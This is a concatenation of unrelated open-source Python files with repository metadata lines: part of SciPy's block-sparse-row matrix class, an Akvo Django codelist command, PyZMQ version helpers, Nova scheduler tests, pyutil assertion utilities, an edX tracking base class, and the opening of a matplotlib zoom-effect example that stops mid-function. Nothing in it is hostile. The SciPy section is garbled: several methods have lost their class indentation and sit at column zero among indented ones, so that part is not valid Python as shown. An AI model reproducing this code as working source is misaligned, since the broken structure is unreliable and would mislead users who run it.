                    blocksize = (1,1)
                else:
                    if not isshape(blocksize):
                        raise ValueError('invalid blocksize=%s' % blocksize)
                    blocksize = tuple(blocksize)
                self.data = np.zeros((0,) + blocksize, getdtype(dtype, default=float))
                R,C = blocksize
                if (M % R) != 0 or (N % C) != 0:
                    raise ValueError('shape must be multiple of blocksize')
                # Select index dtype large enough to pass array and
                # scalar parameters to sparsetools
                idx_dtype = get_index_dtype(maxval=max(M//R, N//C, R, C))
                self.indices = np.zeros(0, dtype=idx_dtype)
                self.indptr = np.zeros(M//R + 1, dtype=idx_dtype)

            elif len(arg1) == 2:
                # (data,(row,col)) format
                from .coo import coo_matrix
                self._set_self(
                    coo_matrix(arg1, dtype=dtype, shape=shape).tobsr(
                        blocksize=blocksize
                    )
                )

            elif len(arg1) == 3:
                # (data,indices,indptr) format
                (data, indices, indptr) = arg1

                # Select index dtype large enough to pass array and
                # scalar parameters to sparsetools
                maxval = 1
                if shape is not None:
                    maxval = max(shape)
                if blocksize is not None:
                    maxval = max(maxval, max(blocksize))
                idx_dtype = get_index_dtype((indices, indptr), maxval=maxval,
                                            check_contents=True)
                self.indices = np.array(indices, copy=copy, dtype=idx_dtype)
                self.indptr = np.array(indptr, copy=copy, dtype=idx_dtype)
                self.data = getdata(data, copy=copy, dtype=dtype)
                if self.data.ndim != 3:
                    raise ValueError(
                        'BSR data must be 3-dimensional, got shape=%s' % (
                            self.data.shape,))
                if blocksize is not None:
                    # explicit blocksize must agree with the data blocks
                    if not isshape(blocksize):
                        raise ValueError('invalid blocksize=%s' % (blocksize,))
                    if tuple(blocksize) != self.data.shape[1:]:
                        raise ValueError('mismatching blocksize=%s vs %s' % (
                            blocksize, self.data.shape[1:]))
            else:
                raise ValueError('unrecognized bsr_matrix constructor usage')
        else:
            # must be dense
            try:
                arg1 = np.asarray(arg1)
            except Exception as e:
                raise ValueError("unrecognized form for"
                                 " %s_matrix constructor" % self.format) from e
            from .coo import coo_matrix
            arg1 = coo_matrix(arg1, dtype=dtype).tobsr(blocksize=blocksize)
            self._set_self(arg1)

        if shape is not None:
            self._shape = check_shape(shape)
        else:
            if self.shape is None:
                # shape not already set, try to infer dimensions
                try:
                    M = len(self.indptr) - 1
                    N = self.indices.max() + 1
                except Exception as e:
                    raise ValueError('unable to infer matrix dimensions') from e
                else:
                    R,C = self.blocksize
                    self._shape = check_shape((M*R,N*C))

        if self.shape is None:
            if shape is None:
                # TODO infer shape here
                raise ValueError('need to infer shape')
            else:
                self._shape = check_shape(shape)

        if dtype is not None:
            # honor an explicit dtype request
            self.data = self.data.astype(dtype, copy=False)

        self.check_format(full_check=False)
    def check_format(self, full_check=True):
        """Check whether the matrix respects the BSR format.

        Parameters
        ----------
        full_check : bool, optional
            If True (default), also run rigorous O(N) checks on the index
            contents; if False, only run cheap O(1) structural checks.
        """
        M,N = self.shape
        R,C = self.blocksize
        # index arrays should have integer data types
        if self.indptr.dtype.kind != 'i':
            warn("indptr array has non-integer dtype (%s)"
                 % self.indptr.dtype.name)
        if self.indices.dtype.kind != 'i':
            warn("indices array has non-integer dtype (%s)"
                 % self.indices.dtype.name)
        # normalize both index arrays to one adequate integer dtype
        idx_dtype = get_index_dtype((self.indices, self.indptr))
        self.indptr = np.asarray(self.indptr, dtype=idx_dtype)
        self.indices = np.asarray(self.indices, dtype=idx_dtype)
        # sparsetools routines require native byte ordering
        self.data = to_native(self.data)
        # check array shapes
        if self.indices.ndim != 1 or self.indptr.ndim != 1:
            raise ValueError("indices, and indptr should be 1-D")
        if self.data.ndim != 3:
            raise ValueError("data should be 3-D")
        # check index pointer: one entry per block row, plus one
        if (len(self.indptr) != M//R + 1):
            raise ValueError("index pointer size (%d) should be (%d)" %
                             (len(self.indptr), M//R + 1))
        if (self.indptr[0] != 0):
            raise ValueError("index pointer should start with 0")
        # check index and data arrays
        if (len(self.indices) != len(self.data)):
            raise ValueError("indices and data should have the same size")
        if (self.indptr[-1] > len(self.indices)):
            raise ValueError("Last value of index pointer should be less than "
                             "the size of index and data arrays")
        # drop unused storage past indptr[-1]
        self.prune()
        if full_check:
            # check format validity (more expensive)
            if self.nnz > 0:
                if self.indices.max() >= N//C:
                    raise ValueError("column index values must be < %d (now max %d)" % (N//C, self.indices.max()))
                if self.indices.min() < 0:
                    raise ValueError("column index values must be >= 0")
                if np.diff(self.indptr).min() < 0:
                    raise ValueError("index pointer values must form a "
                                     "non-decreasing sequence")
        # if not self.has_sorted_indices():
        #    warn('Indices were not in sorted order. Sorting indices.')
        #    self.sort_indices(check_first=False)
    def _get_blocksize(self):
        # (R, C) block shape, taken from the trailing two dims of the
        # 3-D data array; kept in sync with data automatically.
        return self.data.shape[1:]
    blocksize = property(fget=_get_blocksize)
def getnnz(self, axis=None):
if axis is not None:
raise NotImplementedError("getnnz over an axis is not implemented "
"for BSR format")
R,C = self.blocksize
return int(self.indptr[-1] * R * C)
getnnz.__doc__ = spmatrix.getnnz.__doc__
def __repr__(self):
format = _formats[self.getformat()][1]
return ("<%dx%d sparse matrix of type '%s'\n"
"\twith %d stored elements (blocksize = %dx%d) in %s format>" %
(self.shape + (self.dtype.type, self.nnz) + self.blocksize +
(format,)))
    def diagonal(self, k=0):
        """Return the k-th diagonal as a dense 1-D array."""
        rows, cols = self.shape
        if k <= -rows or k >= cols:
            # diagonal lies entirely outside the matrix
            return np.empty(0, dtype=self.data.dtype)
        R, C = self.blocksize
        # length of the k-th diagonal of a rows x cols matrix
        y = np.zeros(min(rows + min(k, 0), cols - max(k, 0)),
                     dtype=upcast(self.dtype))
        _sparsetools.bsr_diagonal(k, rows // R, cols // C, R, C,
                                  self.indptr, self.indices,
                                  np.ravel(self.data), y)
        return y
    diagonal.__doc__ = spmatrix.diagonal.__doc__
##########################
# NotImplemented methods #
##########################
def __getitem__(self,key):
raise NotImplementedError
def __setitem__(self,key,val):
raise NotImplementedError
######################
# Arithmetic methods #
######################
    # Deprecated alias kept for backward compatibility; use ``A * x``.
    @np.deprecate(message="BSR matvec is deprecated in SciPy 0.19.0. "
                  "Use * operator instead.")
    def matvec(self, other):
        """Multiply matrix by vector (deprecated; use the * operator)."""
        return self * other
    # Deprecated alias kept for backward compatibility; use ``A * B``.
    @np.deprecate(message="BSR matmat is deprecated in SciPy 0.19.0. "
                  "Use * operator instead.")
    def matmat(self, other):
        """Multiply this sparse matrix by other matrix (deprecated; use *)."""
        return self * other
def _add_dense(self, other):
return self.tocoo(copy=False)._add_dense(other)
    def _mul_vector(self, other):
        # Matrix-vector product via the C routine bsr_matvec.
        M,N = self.shape
        R,C = self.blocksize
        # result dtype must be able to hold products of both operand dtypes
        result = np.zeros(self.shape[0], dtype=upcast(self.dtype, other.dtype))
        bsr_matvec(M//R, N//C, R, C,
            self.indptr, self.indices, self.data.ravel(),
            other, result)
        return result
    def _mul_multivector(self,other):
        # Matrix times dense 2-D array; all column vectors handled in C.
        R,C = self.blocksize
        M,N = self.shape
        n_vecs = other.shape[1]  # number of column vectors
        result = np.zeros((M,n_vecs), dtype=upcast(self.dtype,other.dtype))
        bsr_matvecs(M//R, N//C, n_vecs, R, C,
                    self.indptr, self.indices, self.data.ravel(),
                    other.ravel(), result.ravel())
        return result
    def _mul_sparse_matrix(self, other):
        # Sparse-sparse product; *other* is converted to BSR with a
        # compatible blocksize so block-level multiplication can be used.
        M, K1 = self.shape
        K2, N = other.shape
        R,n = self.blocksize
        # convert to this format
        if isspmatrix_bsr(other):
            C = other.blocksize[1]
        else:
            C = 1
        from .csr import isspmatrix_csr
        if isspmatrix_csr(other) and n == 1:
            other = other.tobsr(blocksize=(n,C), copy=False)  # lightweight conversion
        else:
            other = other.tobsr(blocksize=(n,C))
        # first pass: count the number of blocks in the product (bnnz)
        idx_dtype = get_index_dtype((self.indptr, self.indices,
                                     other.indptr, other.indices))
        bnnz = csr_matmat_maxnnz(M//R, N//C,
                                 self.indptr.astype(idx_dtype),
                                 self.indices.astype(idx_dtype),
                                 other.indptr.astype(idx_dtype),
                                 other.indices.astype(idx_dtype))
        # second pass: pick an index dtype wide enough for bnnz, then multiply
        idx_dtype = get_index_dtype((self.indptr, self.indices,
                                     other.indptr, other.indices),
                                    maxval=bnnz)
        indptr = np.empty(self.indptr.shape, dtype=idx_dtype)
        indices = np.empty(bnnz, dtype=idx_dtype)
        data = np.empty(R*C*bnnz, dtype=upcast(self.dtype,other.dtype))
        bsr_matmat(bnnz, M//R, N//C, R, C, n,
                   self.indptr.astype(idx_dtype),
                   self.indices.astype(idx_dtype),
                   np.ravel(self.data),
                   other.indptr.astype(idx_dtype),
                   other.indices.astype(idx_dtype),
                   np.ravel(other.data),
                   indptr,
                   indices,
                   data)
        data = data.reshape(-1,R,C)
        # TODO eliminate zeros
        return bsr_matrix((data,indices,indptr),shape=(M,N),blocksize=(R,C))
######################
# Conversion methods #
######################
def tobsr(self, blocksize=None, copy=False):
"""Convert this matrix into Block Sparse Row Format.
With copy=False, the data/indices may be shared between this
matrix and the resultant bsr_matrix.
If blocksize=(R, C) is provided, it will be used for determining
block size of the bsr_matrix.
"""
if blocksize not in [None, self.blocksize]:
return self.tocsr().tobsr(blocksize=blocksize)
if copy:
return self.copy()
else:
return self
    def tocsr(self, copy=False):
        M, N = self.shape
        R, C = self.blocksize
        nnz = self.nnz
        # index dtype must accommodate both nnz and the column count
        idx_dtype = get_index_dtype((self.indptr, self.indices),
                                    maxval=max(nnz, N))
        indptr = np.empty(M + 1, dtype=idx_dtype)
        indices = np.empty(nnz, dtype=idx_dtype)
        data = np.empty(nnz, dtype=upcast(self.dtype))
        # expand each stored block into individual CSR entries in C
        bsr_tocsr(M // R,  # n_brow
                  N // C,  # n_bcol
                  R, C,
                  self.indptr.astype(idx_dtype, copy=False),
                  self.indices.astype(idx_dtype, copy=False),
                  self.data,
                  indptr,
                  indices,
                  data)
        from .csr import csr_matrix
        return csr_matrix((data, indices, indptr), shape=self.shape)
    tocsr.__doc__ = spmatrix.tocsr.__doc__
def tocsc(self, copy=False):
return self.tocsr(copy=False).tocsc(copy=copy)
tocsc.__doc__ = spmatrix.tocsc.__doc__
    def tocoo(self, copy=True):
        """Convert this matrix to COOrdinate format.

        When copy=False the data array will be shared between
        this matrix and the resultant coo_matrix.
        """
        M,N = self.shape
        R,C = self.blocksize
        indptr_diff = np.diff(self.indptr)
        if indptr_diff.dtype.itemsize > np.dtype(np.intp).itemsize:
            # Check for potential overflow
            indptr_diff_limited = indptr_diff.astype(np.intp)
            if np.any(indptr_diff_limited != indptr_diff):
                raise ValueError("Matrix too big to convert")
            indptr_diff = indptr_diff_limited
        # row index of each block's first row, repeated once per stored block,
        # then expanded to one entry per element within the R x C block
        row = (R * np.arange(M//R)).repeat(indptr_diff)
        row = row.repeat(R*C).reshape(-1,R,C)
        row += np.tile(np.arange(R).reshape(-1,1), (1,C))
        row = row.reshape(-1)
        # column index: expand block column indices to per-element columns
        col = (C * self.indices).repeat(R*C).reshape(-1,R,C)
        col += np.tile(np.arange(C), (R,1))
        col = col.reshape(-1)
        data = self.data.reshape(-1)
        if copy:
            data = data.copy()
        from .coo import coo_matrix
        return coo_matrix((data,(row,col)), shape=self.shape)
def toarray(self, order=None, out=None):
return self.tocoo(copy=False).toarray(order=order, out=out)
toarray.__doc__ = spmatrix.toarray.__doc__
    def transpose(self, axes=None, copy=False):
        if axes is not None:
            raise ValueError(("Sparse matrices do not support "
                              "an 'axes' parameter because swapping "
                              "dimensions is the only logical permutation."))
        R, C = self.blocksize
        M, N = self.shape
        # number of stored blocks
        NBLK = self.nnz//(R*C)
        if self.nnz == 0:
            # empty matrix: build an empty transpose with swapped dimensions
            return bsr_matrix((N, M), blocksize=(C, R),
                              dtype=self.dtype, copy=copy)
        # transpose swaps the block grid (N//C rows) and each block's shape
        indptr = np.empty(N//C + 1, dtype=self.indptr.dtype)
        indices = np.empty(NBLK, dtype=self.indices.dtype)
        data = np.empty((NBLK, C, R), dtype=self.data.dtype)
        bsr_transpose(M//R, N//C, R, C,
                      self.indptr, self.indices, self.data.ravel(),
                      indptr, indices, data.ravel())
        return bsr_matrix((data, indices, indptr),
                          shape=(N, M), copy=copy)
    transpose.__doc__ = spmatrix.transpose.__doc__
##############################################################
# methods that examine or modify the internal data structure #
##############################################################
    def eliminate_zeros(self):
        """Remove zero elements in-place."""
        if not self.nnz:
            return  # nothing to do
        R,C = self.blocksize
        M,N = self.shape
        mask = (self.data != 0).reshape(-1,R*C).sum(axis=1)  # nonzero blocks
        nonzero_blocks = mask.nonzero()[0]
        # compact the data array so nonzero blocks are contiguous up front
        self.data[:len(nonzero_blocks)] = self.data[nonzero_blocks]
        # modifies self.indptr and self.indices *in place*
        _sparsetools.csr_eliminate_zeros(M//R, N//C, self.indptr,
                                         self.indices, mask)
        self.prune()
    def sum_duplicates(self):
        """Eliminate duplicate matrix entries by adding them together.

        This is an *in place* operation.
        """
        if self.has_canonical_format:
            return
        self.sort_indices()
        R, C = self.blocksize
        M, N = self.shape
        # port of _sparsetools.csr_sum_duplicates
        n_row = M // R
        nnz = 0
        row_end = 0
        for i in range(n_row):
            jj = row_end
            row_end = self.indptr[i+1]
            while jj < row_end:
                j = self.indices[jj]
                # NOTE(review): self.data[jj] is a view; the += below
                # accumulates duplicates into that block in place before it
                # is copied to slot nnz (nnz <= jj throughout, so the slot
                # being written has already been consumed).
                x = self.data[jj]
                jj += 1
                while jj < row_end and self.indices[jj] == j:
                    x += self.data[jj]
                    jj += 1
                self.indices[nnz] = j
                self.data[nnz] = x
                nnz += 1
            self.indptr[i+1] = nnz
        self.prune()  # nnz may have changed
        self.has_canonical_format = True
    def sort_indices(self):
        """Sort the indices of this matrix *in place*
        """
        if self.has_sorted_indices:
            return
        R,C = self.blocksize
        M,N = self.shape
        # C routine sorts block column indices within each block row,
        # permuting the data blocks to match
        bsr_sort_indices(M//R, N//C, R, C, self.indptr, self.indices, self.data.ravel())
        self.has_sorted_indices = True
def prune(self):
""" Remove empty space after all non-zero elements.
"""
R,C = self.blocksize
M,N = self.shape
if len(self.indptr) != M//R + 1:
raise ValueError("index pointer has invalid length")
bnnz = self.indptr[-1]
if len(self.indices) < bnnz:
raise ValueError("indices array has too few elements")
if len(self.data) < bnnz:
raise ValueError("data array has too few elements")
self.data = self.data[:bnnz]
self.indices = self.indices[:bnnz]
# utility functions
    def _binopt(self, other, op, in_shape=None, out_shape=None):
        """Apply the binary operation fn to two sparse matrices."""
        # Ideally we'd take the GCDs of the blocksize dimensions
        # and explode self and other to match.
        other = self.__class__(other, blocksize=self.blocksize)
        # e.g. bsr_plus_bsr, etc.
        fn = getattr(_sparsetools, self.format + op + self.format)
        R,C = self.blocksize
        # upper bound on the number of blocks in the result
        max_bnnz = len(self.data) + len(other.data)
        idx_dtype = get_index_dtype((self.indptr, self.indices,
                                     other.indptr, other.indices),
                                    maxval=max_bnnz)
        indptr = np.empty(self.indptr.shape, dtype=idx_dtype)
        indices = np.empty(max_bnnz, dtype=idx_dtype)
        bool_ops = ['_ne_', '_lt_', '_gt_', '_le_', '_ge_']
        if op in bool_ops:
            # comparison operators yield boolean matrices
            data = np.empty(R*C*max_bnnz, dtype=np.bool_)
        else:
            data = np.empty(R*C*max_bnnz, dtype=upcast(self.dtype,other.dtype))
        fn(self.shape[0]//R, self.shape[1]//C, R, C,
           self.indptr.astype(idx_dtype),
           self.indices.astype(idx_dtype),
           self.data,
           other.indptr.astype(idx_dtype),
           other.indices.astype(idx_dtype),
           np.ravel(other.data),
           indptr,
           indices,
           data)
        actual_bnnz = indptr[-1]
        indices = indices[:actual_bnnz]
        data = data[:R*C*actual_bnnz]
        # copy when the overallocation was large, to release excess memory
        if actual_bnnz < max_bnnz/2:
            indices = indices.copy()
            data = data.copy()
        data = data.reshape(-1,R,C)
        return self.__class__((data, indices, indptr), shape=self.shape)
# needed by _data_matrix
def _with_data(self,data,copy=True):
"""Returns a matrix with the same sparsity structure as self,
but with different data. By default the structure arrays
(i.e. .indptr and .indices) are copied.
"""
if copy:
return self.__class__((data,self.indices.copy(),self.indptr.copy()),
shape=self.shape,dtype=data.dtype)
else:
return self.__class__((data,self.indices,self.indptr),
shape=self.shape,dtype=data.dtype)
# # these functions are used by the parent class
    # # to remove redundancy between bsc_matrix and bsr_matrix
# def _swap(self,x):
# """swap the members of x if this is a column-oriented matrix
# """
# return (x[0],x[1])
def isspmatrix_bsr(x):
    """Check whether *x* is an instance of ``bsr_matrix``.

    Parameters
    ----------
    x
        object to check for being a bsr matrix

    Returns
    -------
    bool
        True if x is a bsr matrix, False otherwise

    Examples
    --------
    >>> from scipy.sparse import bsr_matrix, isspmatrix_bsr
    >>> isspmatrix_bsr(bsr_matrix([[5]]))
    True

    >>> from scipy.sparse import bsr_matrix, csr_matrix, isspmatrix_bsr
    >>> isspmatrix_bsr(csr_matrix([[5]]))
    False
    """
    return isinstance(x, bsr_matrix)
| bsd-3-clause |
akvo/akvo-rsr | akvo/rsr/management/commands/create_organisation_codelist.py | 1 | 1787 | # -*- coding: utf-8 -*-
# Akvo Reporting is covered by the GNU Affero General Public License.
# See more details in the license.txt file located at the root folder of the Akvo RSR module.
# For additional details on the GNU license please see < http://www.gnu.org/licenses/agpl.html >.
"""Create or Update a codelist and optionally link it to organisations.
Usage:
    python manage.py create_organisation_codelist <slug> <json-path> [<org-ids> ...]
"""
import json
import sys
from django.core.management.base import BaseCommand
from akvo.rsr.models import OrganisationCodelist, Organisation
class Command(BaseCommand):
    help = __doc__

    def add_arguments(self, parser):
        parser.add_argument('slug', type=str)
        parser.add_argument('json_path', type=open)
        # nargs='*' (not '+') so organisation ids are genuinely optional,
        # matching the module docstring ("optionally link it to organisations").
        parser.add_argument('org_ids', nargs='*', type=int)
        parser.add_argument('--update', action='store_true', dest='update')

    def handle(self, *args, **options):
        """Create or update the codelist, then link it to the organisations.

        Exits with status 1 when the codelist already exists (and --update
        was not given) or when any requested organisation id is unknown.
        """
        org_ids = options['org_ids']
        organisations = Organisation.objects.filter(id__in=org_ids)
        update = options['update']
        data = json.load(options['json_path'])
        codelist, created = OrganisationCodelist.objects.get_or_create(
            slug=options['slug'], defaults={'data': data})
        if not created and not update:
            print('Codelist with the slug already exists. Use --update to update it.')
            sys.exit(1)
        if update:
            codelist.data = data
            codelist.save(update_fields=['data'])
        missing_orgs = set(org_ids) - set(org.id for org in organisations)
        if missing_orgs:
            print('Could not find organisations with ids: ', list(missing_orgs))
            sys.exit(1)
        # Only touch the DB when there is actually something to link.
        if org_ids:
            organisations.update(codelist=codelist)
| agpl-3.0 |
Alidron/demo-nao | alidron-env/lib/python2.7/site-packages/zmq/sugar/version.py | 5 | 1231 | """PyZMQ and 0MQ version functions."""
# Copyright (C) PyZMQ Developers
# Distributed under the terms of the Modified BSD License.
from zmq.backend import zmq_version_info
VERSION_MAJOR = 15
VERSION_MINOR = 2
VERSION_PATCH = 0
VERSION_EXTRA = ""

# Human-readable version string, e.g. '15.2.0' (plus '.<extra>' for dev builds).
__version__ = '%i.%i.%i' % (VERSION_MAJOR, VERSION_MINOR, VERSION_PATCH)
# Tuple form; dev builds get float('inf') appended so they compare after releases.
version_info = (VERSION_MAJOR, VERSION_MINOR, VERSION_PATCH)
if VERSION_EXTRA:
    __version__ = "%s.%s" % (__version__, VERSION_EXTRA)
    version_info = version_info + (float('inf'),)

__revision__ = ''


def pyzmq_version():
    """return the version of pyzmq as a string"""
    if not __revision__:
        return __version__
    return '@'.join([__version__, __revision__[:6]])


def pyzmq_version_info():
    """return the pyzmq version as a tuple of at least three numbers

    If pyzmq is a development version, `inf` will be appended after the
    third integer.
    """
    return version_info
def zmq_version():
    """return the version of libzmq as a string"""
    major, minor, patch = zmq_version_info()
    return "%i.%i.%i" % (major, minor, patch)


__all__ = ['zmq_version', 'zmq_version_info',
           'pyzmq_version', 'pyzmq_version_info',
           '__version__', '__revision__']
| mpl-2.0 |
dawnpower/nova | nova/tests/unit/scheduler/test_scheduler_options.py | 30 | 5233 | # Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests For SchedulerOptions.
"""
import datetime
import StringIO
from oslo_serialization import jsonutils
from nova.scheduler import scheduler_options
from nova import test
class FakeSchedulerOptions(scheduler_options.SchedulerOptions):
    """Test double overriding the time and file access of SchedulerOptions."""
    def __init__(self, last_checked, now, file_old, file_now, data, filedata):
        super(FakeSchedulerOptions, self).__init__()
        # Change internals ...
        self.last_modified = file_old
        self.last_checked = last_checked
        self.data = data
        # For overrides ...
        self._time_now = now
        self._file_now = file_now
        self._file_data = filedata
        # Set True by _get_file_handle so tests can detect a reload.
        self.file_was_loaded = False
    def _get_file_timestamp(self, filename):
        # Return the canned mtime instead of stat()ing a real file.
        return self._file_now
    def _get_file_handle(self, filename):
        self.file_was_loaded = True
        return StringIO.StringIO(self._file_data)
    def _get_time_now(self):
        # Return the canned "current" time instead of the real clock.
        return self._time_now
class SchedulerOptionsTestCase(test.NoDBTestCase):
    """Exercise SchedulerOptions reload logic via FakeSchedulerOptions.

    Each test fixes the "last checked" time, the fake current time, the
    file's old/new mtimes, and the cached vs. on-disk data, then checks
    whether get_configuration() reloads the file.
    """
    def test_get_configuration_first_time_no_flag(self):
        """Without a filename argument nothing is ever loaded."""
        last_checked = None
        now = datetime.datetime(2012, 1, 1, 1, 1, 1)
        file_old = None
        file_now = datetime.datetime(2012, 1, 1, 1, 1, 1)
        data = dict(a=1, b=2, c=3)
        jdata = jsonutils.dumps(data)
        fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
                                    {}, jdata)
        self.assertEqual({}, fake.get_configuration())
        self.assertFalse(fake.file_was_loaded)
    def test_get_configuration_first_time_empty_file(self):
        """An empty file loads but yields an empty configuration."""
        last_checked = None
        now = datetime.datetime(2012, 1, 1, 1, 1, 1)
        file_old = None
        file_now = datetime.datetime(2012, 1, 1, 1, 1, 1)
        jdata = ""
        fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
                                    {}, jdata)
        self.assertEqual({}, fake.get_configuration('foo.json'))
        self.assertTrue(fake.file_was_loaded)
    def test_get_configuration_first_time_happy_day(self):
        """First call with a filename loads and returns the file's data."""
        last_checked = None
        now = datetime.datetime(2012, 1, 1, 1, 1, 1)
        file_old = None
        file_now = datetime.datetime(2012, 1, 1, 1, 1, 1)
        data = dict(a=1, b=2, c=3)
        jdata = jsonutils.dumps(data)
        fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
                                    {}, jdata)
        self.assertEqual(data, fake.get_configuration('foo.json'))
        self.assertTrue(fake.file_was_loaded)
    def test_get_configuration_second_time_no_change(self):
        """Unchanged mtime: cached data is returned, no reload."""
        last_checked = datetime.datetime(2011, 1, 1, 1, 1, 1)
        now = datetime.datetime(2012, 1, 1, 1, 1, 1)
        file_old = datetime.datetime(2012, 1, 1, 1, 1, 1)
        file_now = datetime.datetime(2012, 1, 1, 1, 1, 1)
        data = dict(a=1, b=2, c=3)
        jdata = jsonutils.dumps(data)
        fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
                                    data, jdata)
        self.assertEqual(data, fake.get_configuration('foo.json'))
        self.assertFalse(fake.file_was_loaded)
    def test_get_configuration_second_time_too_fast(self):
        """Checked again within the poll interval: stale data, no reload."""
        last_checked = datetime.datetime(2011, 1, 1, 1, 1, 1)
        now = datetime.datetime(2011, 1, 1, 1, 1, 2)
        file_old = datetime.datetime(2012, 1, 1, 1, 1, 1)
        file_now = datetime.datetime(2013, 1, 1, 1, 1, 1)
        old_data = dict(a=1, b=2, c=3)
        data = dict(a=11, b=12, c=13)
        jdata = jsonutils.dumps(data)
        fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
                                    old_data, jdata)
        self.assertEqual(old_data, fake.get_configuration('foo.json'))
        self.assertFalse(fake.file_was_loaded)
    def test_get_configuration_second_time_change(self):
        """File mtime advanced and poll interval passed: data is reloaded."""
        last_checked = datetime.datetime(2011, 1, 1, 1, 1, 1)
        now = datetime.datetime(2012, 1, 1, 1, 1, 1)
        file_old = datetime.datetime(2012, 1, 1, 1, 1, 1)
        file_now = datetime.datetime(2013, 1, 1, 1, 1, 1)
        old_data = dict(a=1, b=2, c=3)
        data = dict(a=11, b=12, c=13)
        jdata = jsonutils.dumps(data)
        fake = FakeSchedulerOptions(last_checked, now, file_old, file_now,
                                    old_data, jdata)
        self.assertEqual(data, fake.get_configuration('foo.json'))
        self.assertTrue(fake.file_was_loaded)
| apache-2.0 |
koomik/CouchPotatoServer | libs/pyutil/assertutil.py | 106 | 2753 | # Copyright (c) 2003-2009 Zooko Wilcox-O'Hearn
# This file is part of pyutil; see README.rst for licensing terms.
"""
Tests useful in assertion checking, prints out nicely formated messages too.
"""
from humanreadable import hr
def _format_args(msgbuf, args, kwargs):
    # Shared message builder for _assert/precondition/postcondition.
    # Appends "value type" descriptions (via hr()) for each positional
    # argument, then "key: value type" descriptions for each keyword
    # argument.  The triple-underscore caller parameters avoid colliding
    # with user-supplied keyword names.
    if args:
        msgbuf.append("%s %s" % tuple(map(hr, (args[0], type(args[0])))))
        msgbuf.extend([", %s %s" % tuple(map(hr, (arg, type(arg)))) for arg in args[1:]])
        remaining = list(kwargs.items())
    else:
        remaining = list(kwargs.items())
        if remaining:
            k, v = remaining.pop(0)
            msgbuf.append("%s: %s %s" % ((k,) + tuple(map(hr, (v, type(v))))))
    # Bug fix: the original dropped every keyword argument after the first
    # whenever positional args were present; now all kwargs are reported.
    # (Also fixed: py2-only `raise X, msg` syntax and `dict.items()[0]`
    # indexing, which fail on Python 3; this form works on both.)
    msgbuf.extend([", %s: %s %s" % ((k,) + tuple(map(hr, (v, type(v))))) for k, v in remaining])

def _assert(___cond=False, *___args, **___kwargs):
    """Return True if ___cond is true, else raise AssertionError whose
    message describes the supplied positional and keyword arguments."""
    if ___cond:
        return True
    msgbuf = []
    _format_args(msgbuf, ___args, ___kwargs)
    raise AssertionError("".join(msgbuf))

def precondition(___cond=False, *___args, **___kwargs):
    """Like _assert, but the message is prefixed with 'precondition'."""
    if ___cond:
        return True
    msgbuf = ["precondition"]
    if ___args or ___kwargs:
        msgbuf.append(": ")
    _format_args(msgbuf, ___args, ___kwargs)
    raise AssertionError("".join(msgbuf))

def postcondition(___cond=False, *___args, **___kwargs):
    """Like _assert, but the message is prefixed with 'postcondition'."""
    if ___cond:
        return True
    msgbuf = ["postcondition"]
    if ___args or ___kwargs:
        msgbuf.append(": ")
    _format_args(msgbuf, ___args, ___kwargs)
    raise AssertionError("".join(msgbuf))
| gpl-3.0 |
eemirtekin/edx-platform | common/djangoapps/track/management/tracked_command.py | 255 | 2063 | """Provides management command calling info to tracking context."""
from django.core.management.base import BaseCommand
from eventtracking import tracker
class TrackedCommand(BaseCommand):
    """
    Base class that adds management-command calling info to the tracking
    context.

    The value provided to the context is:

    'command': the program name and the subcommand used to run a management
    command.

    For example, running the 'create_user' management command produces a
    tracking-log entry whose "context" includes
    ``"command": "./manage.py create_user"``.  In future, other values
    (such as args and options) could be added as needed.

    The values are added (and removed) under a scoped context named
    "edx.mgmt.command"; the context name scopes the additions but does not
    itself appear in the context output.
    """
    # Captured by create_parser(); stays 'unknown' until a parser is built.
    prog_name = 'unknown'

    def create_parser(self, prog_name, subcommand):
        """Wraps create_parser to snag command line info."""
        self.prog_name = '{} {}'.format(prog_name, subcommand)
        return super(TrackedCommand, self).create_parser(prog_name, subcommand)

    def execute(self, *args, **options):
        """Wraps base execute() to add the command line to the tracking context."""
        context_name = 'edx.mgmt.command'
        context = {'command': self.prog_name}
        with tracker.get_tracker().context(context_name, context):
            super(TrackedCommand, self).execute(*args, **options)
| agpl-3.0 |
ryandougherty/mwa-capstone | MWA_Tools/build/matplotlib/examples/pylab_examples/axes_zoom_effect.py | 3 | 3293 | from matplotlib.transforms import Bbox, TransformedBbox, \
blended_transform_factory
from mpl_toolkits.axes_grid1.inset_locator import BboxPatch, BboxConnector,\
BboxConnectorPatch
def connect_bbox(bbox1, bbox2,
                 loc1a, loc2a, loc1b, loc2b,
                 prop_lines, prop_patches=None):
    """Build the artists linking *bbox1* and *bbox2*: two connector lines,
    a translucent patch over each bbox, and a patch spanning the two.

    Returns (line1, line2, bbox_patch1, bbox_patch2, connector_patch).
    """
    if prop_patches is None:
        # derive patch properties from the line properties, but translucent
        prop_patches = prop_lines.copy()
        prop_patches["alpha"] = prop_patches.get("alpha", 1)*0.2

    connector_a = BboxConnector(bbox1, bbox2, loc1=loc1a, loc2=loc2a, **prop_lines)
    connector_a.set_clip_on(False)
    connector_b = BboxConnector(bbox1, bbox2, loc1=loc1b, loc2=loc2b, **prop_lines)
    connector_b.set_clip_on(False)

    patch1 = BboxPatch(bbox1, **prop_patches)
    patch2 = BboxPatch(bbox2, **prop_patches)

    connector_patch = BboxConnectorPatch(bbox1, bbox2,
                                         loc1a=loc1a, loc2a=loc2a,
                                         loc1b=loc1b, loc2b=loc2b,
                                         **prop_patches)
    connector_patch.set_clip_on(False)

    return connector_a, connector_b, patch1, patch2, connector_patch
def zoom_effect01(ax1, ax2, xmin, xmax, **kwargs):
    u"""
    ax1 : the main axes
    ax2 : the zoomed axes
    (xmin,xmax) : the limits of the colored area in both plot axes.

    connect ax1 & ax2. The x-range of (xmin, xmax) in both axes will
    be marked.  The keyword parameters will be used to create
    patches.
    """
    trans1 = blended_transform_factory(ax1.transData, ax1.transAxes)
